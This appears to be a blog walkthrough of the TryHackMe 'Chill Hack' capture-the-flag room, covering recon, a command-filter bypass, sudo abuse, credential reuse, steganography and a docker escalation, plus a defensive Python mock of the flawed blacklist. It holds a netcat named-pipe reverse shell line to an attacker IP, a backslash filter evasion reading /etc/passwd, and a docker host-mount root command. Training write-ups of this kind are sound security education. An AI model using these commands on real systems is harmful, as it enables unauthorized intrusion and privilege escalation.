TryHackMe — Chill Hack Walkthrough

A walkthrough with my tactics, techniques, and procedures.

xocybersec
5 min read · Feb 20, 2024

Reconnaissance/Scanning:

Let’s start things off with a network scan to see which ports are open and the services running on each.

$ nmap -A -O -sC -sV -p- <machine_IP>

I used Gobuster to enumerate the directories on the web server.

Gobuster scan results

On the FTP server, this is the content of the note text file (note.txt).

Content of note.txt

Okay, there’s a filter used, but where?

Vulnerability Assessment:

I visited the web page and didn’t find much, so I went to the /secret page and found the command text.

Command page

I tried a few commands like whoami, uname -a, ps, and even sudo -l without issue.

uname -a results

sudo -l showed that this account can run the script helpline.sh via sudo.

sudo -l results

However, trying cat, head, tail (and I'm sure more commands) prompted a denial.

It was a long shot, but I tried a reverse shell and it was, of course, denied.

I tried base64-encoding some commands, but that didn't work either. Next, I looked for a few ways to test bypassing the filter.

Initial Foothold:

I tried a few things and one that worked was using a backslash!

$ c\at /etc/passwd

Awesome! Now to try the reverse shell again, this time with a backslash.

$ r\m /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attack_IP> <PORT> >/tmp/f
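As an added example (not code from the room or from the original post), here is a Python mock of why the backslash trick works against a substring blacklist: the filter inspects the raw string, but the shell strips the escape before resolving the command. The blocklist and allowlist contents are assumptions; the hardened check shows the defensive alternative of parsing input the way the shell does and comparing argv[0] against a fixed allowlist, without ever handing the string to a shell.

```python
import shlex

# Assumed shape of the /secret page filter: refuse input that contains a
# blocked command name anywhere in the raw string. (Constructed mock, not the
# room's real source.)
BLOCKED_WORDS = {"cat", "head", "tail", "rm"}

# Hardened alternative: only these programs may be run, and only as argv[0].
ALLOWED_COMMANDS = {"whoami", "uname", "ps", "id"}

# Shell metacharacters that would chain or redirect commands; none are needed
# for the allowlisted programs, so their presence is an outright reject.
SHELL_METACHARS = set(";|&$`><\n")


def naive_blacklist(user_input: str) -> bool:
    """Weak check: True (blocked) if any blocked word appears in the raw text.

    It never sees what the shell will actually execute, so 'c\\at' slips past.
    """
    return any(word in user_input for word in BLOCKED_WORDS)


def resolve_argv(user_input: str) -> list[str]:
    """Parse the input as a POSIX shell would (backslashes and quotes removed)."""
    return shlex.split(user_input, posix=True)


def hardened_check(user_input: str) -> bool:
    """True only if the input is a single allowlisted program with no metacharacters.

    The caller should then execute resolve_argv(user_input) via
    subprocess.run(argv, shell=False) rather than passing the string to a shell.
    """
    if SHELL_METACHARS & set(user_input):
        return False
    try:
        argv = resolve_argv(user_input)
    except ValueError:  # unbalanced quotes or a trailing backslash
        return False
    return bool(argv) and argv[0] in ALLOWED_COMMANDS


if __name__ == "__main__":
    for sample in ("cat /etc/passwd", "c\\at /etc/passwd", "whoami"):
        print(f"{sample!r}: blacklist blocks={naive_blacklist(sample)} "
              f"shell sees={resolve_argv(sample)} hardened allows={hardened_check(sample)}")
```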

Got access! Since this account can run that script from earlier, I wonder what’s in it.

Contents of .helpline.sh

Since it can be run as user apaar, here's the command:

$ sudo -u apaar /home/apaar/.helpline.sh

I had to play around with the script for a while before figuring out that I could call a shell from it and escalate my privileges to the user apaar.

I ended up entering /bin/bash both as the person's name and as the message, which returned a shell.

Proof of user flag

I checked for cron jobs, whether this user could run anything as root, and binaries with the SUID bit set, hoping to escalate to root, but none of those worked.

A good place to check for hidden directories/files is actually in the /var/www directory.

When I checked in there, I saw a directory called files alongside the html directory that holds the web server's files.

Contents of /var/www

Inside /files there are some PHP files to inspect.

Contents of /files

Out of the files inside that directory, index.php had some credentials for MySQL!

Found mysql credentials in plaintext

Another file, hacker.php, had an interesting "hint" with an image. I might need to come back to that.

For now, I'll go ahead and pull it down to my machine using a Python HTTP server.

Well, time to see if there's a MySQL server accessible.

Found tables in webportal database

There is, and the credentials worked!

Using:

select * from users;

Password hashes in database

I visited crackstation[.]net to see if those hashes could be cracked and they could.

Cracked hashes

I tried to escalate to user anurodh with the cracked password, but it didn't work!

Lateral Pivoting:

Alright, no worries; that means I'll have to try some steganography on the image from earlier and hope something is hidden there.

$ stegseek -sf filename -wl /usr/share/wordlists/rockyou.txt

Found file in image

When I tried to unzip the file, it turned out to be password protected. The tool fcrackzip took care of that.

$ fcrackzip -D filename -p /usr/share/wordlists/rockyou.txt -u

Cracked password using fcrackzip

I’ll unzip that file now.

Upon inspecting the PHP file, I found a base64-encoded password and a username.

Base64 encoded password
Found username

Decoding the base64 gave me that user's password.

Decoded base64 password in plaintext

Escalating to that user is a success!

Proof of lateral pivoting

I searched for a way to escalate to root, or even to the other user on the box, aurick, but didn't have any luck.

I then thought that maybe I had to exploit Docker somehow, since this user was a member of the docker group.

Privilege Escalation/Exploit:

There had to be a way to escalate. I checked GTFOBins to see if there was anything about docker, and there was!

$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh

I ran the command and got root privileges!

Proof of root privilege

Now I’ll grab the root flag and be on my way!

Proof of root flag
